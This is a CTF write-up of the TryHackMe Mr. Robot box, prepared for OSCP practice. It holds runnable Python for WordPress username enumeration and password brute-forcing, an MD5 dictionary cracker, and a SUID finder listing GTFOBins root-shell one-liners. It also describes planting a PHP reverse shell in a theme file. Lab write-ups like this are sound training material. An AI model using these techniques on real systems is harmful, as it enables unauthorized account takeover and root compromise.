TryHackMe — Mr. Robot CTF Writeup

Abdulmalik Basulayb
5 min read · Aug 30, 2024


In this second blog of my series, I’ll be diving into the Mr. Robot CTF on TryHackMe as part of my preparation for the OSCP. Inspired by the popular TV show, this challenge is designed to test a wide range of skills. I’ll explain the steps I took and highlight the key lessons learned along the way.

Let’s get started!

Enumeration

As always, I started with a quick nmap scan to identify open ports, services, and versions running on the target machine.

nmap -A -T4 -Pn 10.10.1.110
  • -A: Enable OS detection, version detection, script scanning, and traceroute
  • -T4: Aggressive timing template for faster execution
  • -Pn: Treat all hosts as online — skip host discovery

The results show that port 22 (SSH) is closed, while ports 80 (HTTP) and 443 (HTTPS) are open.

Before diving into the investigation of the web page on port 80, I decided to run a deeper nmap scan to ensure that nothing is missed.

The script scan turned up several interesting directories and files that deserve a closer look.

Inspecting each of these findings paid off: robots.txt pointed to the first key and to a wordlist file that might contain credentials.

We downloaded both files for further analysis and submitted the first key.

Before investigating the wordlist we obtained, I decided to check the /license file.

We found an amusing comment from the developer. The page source, however, also contained a string encoded in base64.

Upon decoding, we found what appears to be the credentials for the WordPress login.

However, even though we found these credentials, I’d still prefer to brute-force the login using the wordlist we obtained.

We first checked the line count of the wordlist, then sorted it and removed duplicate entries, which shrinks it considerably and cuts the time spent waiting on the brute-force.

Web-Exploit

One thing to note about WordPress is that its login error message differs depending on whether the submitted username exists: a non-existent account gets a generic "invalid username" error, while an existing account gets a message saying the password for that username is incorrect. That difference is enough to enumerate valid usernames before touching a single password.

We use Burp Suite to intercept the login request and gather the information needed for the brute-force attack: the POST path, the form field names, and the exact failure string returned for a bad username.

Those three pieces go into Hydra's http-post-form module. We brute-force the usernames first, treating any response that does not contain the "invalid username" error as a hit.

Now that we have the username, we’ll use a similar approach to brute-force the password, with a few adjustments.

We obtained the password, which turned out to be exactly the one found in the /license file. This let us log in as an admin.
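The two-phase attack just described (username enumeration through the differing error messages, then a password run against the confirmed username) is short enough to reproduce end to end. The script below is an added example written for this writeup; it is not the author's Hydra invocation and not WordPress code. It runs offline against a constructed stand-in for wp-login.php (the account demo_user / Demo-Pass-1 is hypothetical), and a real sender would simply POST the log, pwd and wp-submit fields to wp-login.php with redirects disabled. The same two strings are what Hydra's http-post-form module needs as its failure condition: "Invalid username" for the username pass, "is incorrect" for the password pass.

```python
import re
from typing import Callable, Dict, Iterable, List, Optional, Tuple

Response = Tuple[int, str]           # (HTTP status, response body)
Sender = Callable[[str, str], Response]

# Error strings WordPress places in <div id="login_error"> on wp-login.php.
# "Invalid username" is the 4.x wording (the era of this box); "Unknown username"
# is what current releases say. Both leak the same fact.
NO_SUCH_USER = re.compile(r"Invalid username|Unknown username")
BAD_PASSWORD = re.compile(r"The password you entered for the username .*? is incorrect")


def classify(resp: Response) -> str:
    """Map one login response to what it tells the attacker."""
    status, body = resp
    if status == 302:                # a successful login redirects to /wp-admin/
        return "success"
    if NO_SUCH_USER.search(body):
        return "no_such_user"
    if BAD_PASSWORD.search(body):
        return "valid_user"          # the account exists, only the password was wrong
    return "unknown"


def enumerate_users(candidates: Iterable[str], send: Sender) -> List[str]:
    """Phase 1: find usernames that exist, using a throwaway password."""
    return [u for u in candidates if classify(send(u, "x")) in ("valid_user", "success")]


def brute_force_password(user: str, wordlist: Iterable[str], send: Sender) -> Optional[str]:
    """Phase 2: try each wordlist entry against a username known to be valid."""
    for pwd in wordlist:
        if classify(send(user, pwd)) == "success":
            return pwd
    return None


# --- Constructed stand-in for the target so the script runs offline ---------
# Hypothetical account, not a credential from the box.
_FAKE_ACCOUNTS: Dict[str, str] = {"demo_user": "Demo-Pass-1"}


def fake_wp_login(user: str, pwd: str) -> Response:
    """Imitates wp-login.php: the same three outcomes a real target produces."""
    if user not in _FAKE_ACCOUNTS:
        return 200, ('<div id="login_error"><strong>ERROR</strong>: Invalid username. '
                     '<a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>')
    if _FAKE_ACCOUNTS[user] != pwd:
        return 200, ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
                     f'for the username <strong>{user}</strong> is incorrect.</div>')
    return 302, ""                   # Location: /wp-admin/ on a real server


if __name__ == "__main__":
    users = enumerate_users(["admin", "nobody", "demo_user", "guest"], fake_wp_login)
    print("valid usernames:", users)
    for u in users:
        print(u, "->", brute_force_password(u, ["123456", "password", "Demo-Pass-1"], fake_wp_login))
```

The enumeration phase sends one request per candidate name, so it is cheap even against a long username list; only the confirmed names get the full wordlist, which is the same two-pass structure used with Hydra above.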

After spending some time navigating through the site, I attempted to upload a reverse shell via the plugin page, but it didn’t work. I referred to HackTricks for assistance.

I went to Appearance >> Editor >> 404.php and replaced the theme's existing code with the PHP reverse shell provided by HackTricks.

We then set up Netcat to listen for incoming connections and requested the modified 404.php so that the server executed our payload and connected back, giving us remote code execution (RCE).

Full TTYs from HackTricks

As a rule of thumb, as soon as a reverse shell connects back we upgrade it to a fully interactive TTY, following the HackTricks "Full TTYs" steps, so that tab completion, job control and programs that insist on a terminal (such as su, which we need shortly) behave reliably.

Privilege Escalation

We then ran the usual commands whoami, id, and sudo -l to gather information about the user and check for any sudo privileges, but found nothing interesting.

However, in /home we discovered a user named Robot. The home directory contained the second key, which is only readable by that user, and a file holding Robot's password as a raw MD5 hash.

We will use Hashcat to crack the MD5 password hash.

Cracking the hash reveals the password abcdefghijklmnopqrstuvwxyz.
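The cracking step, together with the wordlist clean-up from the enumeration section, as an added example written for this writeup rather than the author's hashcat run: a dictionary attack on raw MD5 (what hashcat mode 0 does) in plain Python. The wordlist is constructed; the target hash is the MD5 of the password the writeup recovers, which is also the RFC 1321 test vector for the lowercase alphabet. The name robot is the box's user, but the hash file's name and format are not reproduced here.

```python
import hashlib
from typing import Dict, Iterable, List, Optional


def dedupe_wordlist(lines: Iterable[str]) -> List[str]:
    """Equivalent of `sort -u` on a downloaded list: strip line endings, drop blanks
    and duplicates. Order is kept so earlier (more likely) candidates are tried first."""
    seen = set()
    out: List[str] = []
    for raw in lines:
        word = raw.rstrip("\r\n")
        if word and word not in seen:
            seen.add(word)
            out.append(word)
    return out


def crack_md5(targets: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Dictionary attack on raw MD5: hash each candidate once and look it up against
    every outstanding target, so one pass over the wordlist costs the same for N
    hashes as for one. Returns {user: password-or-None}."""
    pending = {h.lower(): user for user, h in targets.items()}
    found: Dict[str, Optional[str]] = {user: None for user in targets}
    for word in wordlist:
        if not pending:
            break
        digest = hashlib.md5(word.encode()).hexdigest()
        user = pending.pop(digest, None)
        if user is not None:
            found[user] = word
    return found


# Constructed wordlist with the duplicates and blank lines a scraped list typically has.
SAMPLE_WORDLIST = ["password\n", "123456\n", "\n", "password\n", "letmein\n",
                   "abcdefghijklmnopqrstuvwxyz\n", "123456\n"]

# MD5 of the password the writeup reports; also RFC 1321's test vector for the alphabet.
TARGETS = {"robot": "c3fcd3d76192e4007dfb496cca67e13b"}


if __name__ == "__main__":
    words = dedupe_wordlist(SAMPLE_WORDLIST)
    print(f"{len(SAMPLE_WORDLIST)} lines -> {len(words)} unique candidates")
    print(crack_md5(TARGETS, words))
```

Raw MD5 is unsalted, so the lookup-by-digest trick above works across any number of hashes at once; the same property is why hashcat churns through billions of MD5 candidates per second on a GPU and why a 26-character password falls instantly when it sits in the wordlist.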

Next, we switch to the Robot user with the recovered password and read the second key. We then run the usual commands to gather information.

Unfortunately, the Robot user can't run any sudo commands. However, that's okay; we can use linPEAS to perform a detailed privilege escalation enumeration.

On the linPEAS report, one notable finding was that nmap has the SUID bit set, so it runs as root no matter which user executes it. Older nmap builds ship an interactive mode from which shell commands can be run, and a shell launched from a root-owned SUID process is a root shell. The hint for this technique came from GTFOBins.

We used nmap's interactive mode to gain root access and retrieve the final key.
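The SUID hunt that linPEAS performed for us, as an added example written for this writeup (not linPEAS or GTFOBins code): a Python equivalent of find / -perm -4000 -type f, followed by a lookup against a small hand-copied table of GTFOBins SUID one-liners. It runs against a constructed temporary directory tree rather than the target's filesystem, so the "nmap" it finds is a placeholder file with the setuid bit set, not a real binary.

```python
import os
import stat
import tempfile
from typing import Dict, List

# Binaries with a documented GTFOBins SUID escalation and the one-liner GTFOBins
# gives for each. Only nmap matters on this box; the others are common companions.
GTFOBINS_SUID: Dict[str, str] = {
    "nmap": "nmap --interactive, then !sh at the nmap> prompt (interactive mode exists in nmap 2.02 to 5.21)",
    "find": "find . -exec /bin/sh -p \\; -quit",
    "bash": "bash -p",
    "python": "python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
}


def find_suid(root: str) -> List[str]:
    """Equivalent of `find ROOT -perm -4000 -type f`: walk the tree and keep regular
    files whose mode carries the setuid bit. Unreadable directories are skipped, as
    they would be for an unprivileged user on a real box, instead of aborting."""
    hits: List[str] = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def triage(paths: List[str]) -> Dict[str, str]:
    """Match each SUID file's basename against the GTFOBins table, the way linPEAS
    highlights 'interesting' SUID binaries. Returns {path: escalation one-liner}."""
    return {p: GTFOBINS_SUID[os.path.basename(p)]
            for p in paths if os.path.basename(p) in GTFOBINS_SUID}


def build_demo_tree() -> str:
    """Constructed stand-in for a filesystem: a temp dir holding one setuid 'nmap'
    and one ordinary 'ls'. Setting u+s on a file you own needs no privileges."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    for name, mode in (("nmap", 0o4755), ("ls", 0o755)):
        path = os.path.join(root, "usr", "bin", name)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")          # placeholder content, never executed
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for path, howto in triage(find_suid(demo_root)).items():
        print(f"{path}: {howto}")
```

On a real target the root of the walk is / and the interesting question is not just which files are setuid but who owns them: a setuid binary owned by root is what yields a root shell, so a practitioner would also check st_uid against 0 before getting excited about a hit.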

Lesson Learned

  • Inspecting every finding from the deeper nmap script scan uncovered the information that gave us a foothold; do not skip the small files it turns up.
  • This challenge can be approached and solved in different ways, which is a reminder to explore several techniques rather than settling on the first one that works.
  • Keep resources like HackTricks and GTFOBins close at hand. They provide hints and techniques that can be crucial, from the theme-editor shell to the SUID escalation used here.
